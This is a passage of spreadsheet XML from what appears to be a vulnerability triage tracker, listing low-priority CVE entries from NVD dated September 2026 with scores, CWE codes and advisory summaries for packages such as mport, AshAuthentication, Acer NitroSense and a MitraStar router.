      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54577</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-693</t>
        </is>
      </c>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, the audit command in mport/mport.c computed option-adjusted local_argv and local_argc values but passed the original argument entry to audit_package(). When an operator or automation used an option such as -r before a package name, stale optind state and the unadjusted argument could cause mport to audit the option token instead of the requested package, producing a false-negative or useless result that could leave a vulnerable package unidentified. The corrected parsing resets optind and optreset before using the adjusted local arguments. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54577</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54578</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-354, CWE-755</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, mport_verify_package() in libmport/verify.c could continue after MD5File() or SHA256_File() failed and compare an expected checksum with stale data in the hash buffer rather than a newly computed digest. An attacker able to influence an installed file or the conditions that make hashing fail could receive a misleading integrity result or hide a checksum failure. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54578</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82723</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information into Log File vulnerability in team-alembic AshAuthentication allows disclosure of user password digests to readers of the audit store.
The audit_log add-on builds each entry's extra_data in AshAuthentication.AddOn.AuditLog.Auditor.build_extra_data/4, which takes :actor from the action callback context verbatim. Any audited action invoked with actor: set to a user record therefore deposits that record, including its hashed_password attribute, into the audit entry. The same module already collapses the audited identity to an opaque string via AshAuthentication.user_to_subject/1 and filters params against the strategy's configured allow-list, so the actor is the only stored value that reaches the audit store unfiltered. Marking the attribute sensitive?: true does not help, because that redacts inspect/1 output rather than JSON encoding or raw-term storage.
There is no attacker-controlled trigger and no network disclosure path: entries accumulate from ordinary authenticated activity, and an attacker's own requests deposit only their own digest. Exploitation requires independent read access to the audit store, such as database credentials, an audit role, a backup, or a log shipper, at which point the digests support offline password attack against every active account. Whether the material persists depends on the data layer, since raw-term stores keep it verbatim while a SQL store raises Protocol.UndefinedError and drops the entry unless the user resource derives Jason.Encoder.
This issue affects ash_authentication: from 4.12.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.2.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82723</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82759</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-760</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t>Use of a One-Way Hash with a Predictable Salt vulnerability in team-alembic AshAuthentication allows readers of the audit store to recover the client IP addresses that the audit log add-on's :hash privacy mode is meant to pseudonymise.
AshAuthentication.AddOn.AuditLog.IpPrivacy.hash_ip/1 computes a single unkeyed :crypto.hash(:sha256, salt &lt;&gt; ip) and truncates the result to 16 hexadecimal characters. The salt is read from the :audit_log_ip_salt or :secret application config keys, and falls back to the constant "default-salt-change-in-production" published in the library source when neither is set, with nothing warning that the default is in use. The IPv4 space is only 2^32 values and SHA-256 is fast, so the whole hash table is precomputable and every stored value maps back to its source address. Truncating to 16 characters does not help, and even a configured salt leaves the hash cheap enough to enumerate once it leaks.
This issue affects ash_authentication: from 4.12.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82759</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50606</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense. The vulnerability is caused by the use of a hard-coded AES encryption key within the software. Under certain circumstances, a local attacker may be able to use the embedded key to access protected information or perform unauthorized actions.</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50606</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50608</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense. The WebSocket handshake process does not properly require authentication before allowing connections to the service. Under certain circumstances, unauthorized access to service functionality may be possible.</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50608</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55061</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>1</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>uniget is a universal installer and updater for (container) tools. Prior to 0.27.6, the hooks edit command in cmd/uniget/hooks.go parses UNIGET_EDITOR or EDITOR with strings.Split(editor, " ") and passes every space-delimited suffix as an argument to the selected editor executable. An attacker who can influence the editor environment and cause hook editing can supply unexpected editor arguments, potentially causing unintended actions with the privileges of the uniget process account. Go os/exec does not evaluate shell operators in these arguments, so the advisory's wrapper demonstration establishes argument delivery but does not establish shell command interpretation. This issue is fixed in version 0.27.6.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55061</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-3030</t>
        </is>
      </c>
      <c r="D398" s="5" t="inlineStr"/>
      <c r="E398" s="5" t="inlineStr"/>
      <c r="F398" s="5" t="inlineStr"/>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr"/>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>Cute Editor for ASP.NET 6.4 is vulnerable to reflected cross-site scripting caused by improper validation of the Theme GET parameter in colorpicker_more.aspx. A remote, unauthenticated attacker can craft a URL that, once opened by a victim in a browser session authenticated to a site running the vulnerable component, executes arbitrary JavaScript in the security context of that site.</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-3030</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-55787</t>
        </is>
      </c>
      <c r="D399" s="5" t="inlineStr"/>
      <c r="E399" s="5" t="inlineStr"/>
      <c r="F399" s="5" t="inlineStr"/>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr"/>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>In MailData Email Archiving System v4.2 and earlier, a SQL injection vulnerability exists.</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-55787</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-62167</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2026-09-17</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr"/>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2026-33626. Reason: This candidate is a duplicate of CVE-2026-33626. Notes: All CVE users should reference CVE-2026-33626 instead of this candidate.</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-62167</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10594</t>
        </is>
      </c>
      <c r="D401" s="5" t="inlineStr"/>
      <c r="E401" s="5" t="inlineStr"/>
      <c r="F401" s="5" t="inlineStr"/>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr"/>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10594</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11314</t>
        </is>
      </c>
      <c r="D402" s="5" t="inlineStr"/>
      <c r="E402" s="5" t="inlineStr"/>
      <c r="F402" s="5" t="inlineStr"/>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="inlineStr"/>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr"/>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11314</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11432</t>
        </is>
      </c>
      <c r="D403" s="5" t="inlineStr"/>
      <c r="E403" s="5" t="inlineStr"/>
      <c r="F403" s="5" t="inlineStr"/>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr"/>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11432</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11874</t>
        </is>
      </c>
      <c r="D404" s="5" t="inlineStr"/>
      <c r="E404" s="5" t="inlineStr"/>
      <c r="F404" s="5" t="inlineStr"/>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr"/>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: Red Hat Product Security has come to the conclusion that this CVE is not needed.</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11874</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49137</t>
        </is>
      </c>
      <c r="D405" s="5" t="inlineStr"/>
      <c r="E405" s="5" t="inlineStr"/>
      <c r="F405" s="5" t="inlineStr"/>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr"/>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49137</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49292</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>0</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t>Kiwi TCMS is an open source test management system. Prior to 16.0, the unauthenticated /init-db/ page handled by InitDBView in tcms/core/views.py remains reachable after initial setup and proxies repeated requests to Kiwi/manage.py migrate. The migration command is reentrant, so repeated access reports that no migrations are available and does not cause data loss, alter application state, reveal confidential information, or produce a documented availability impact. This issue is fixed in version 16.0.</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49292</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52483</t>
        </is>
      </c>
      <c r="D407" s="5" t="inlineStr"/>
      <c r="E407" s="5" t="inlineStr"/>
      <c r="F407" s="5" t="inlineStr"/>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr"/>
      <c r="S407" s="5" t="inlineStr">
        <is>
          <t>The ping diagnostics and other similar functions of the MitraStar GPT-2741GNAC-N2-SV router with firmware BR_g8.10_1.11(WVK.0)b46 allow authenticated users execute arbitrary OS command via concatenated params on a crafted POST request for the endpoint /cgi-bin/device-management-utilities-internet.cgi.</t>
        </is>
      </c>
      <c r="T407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52483</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
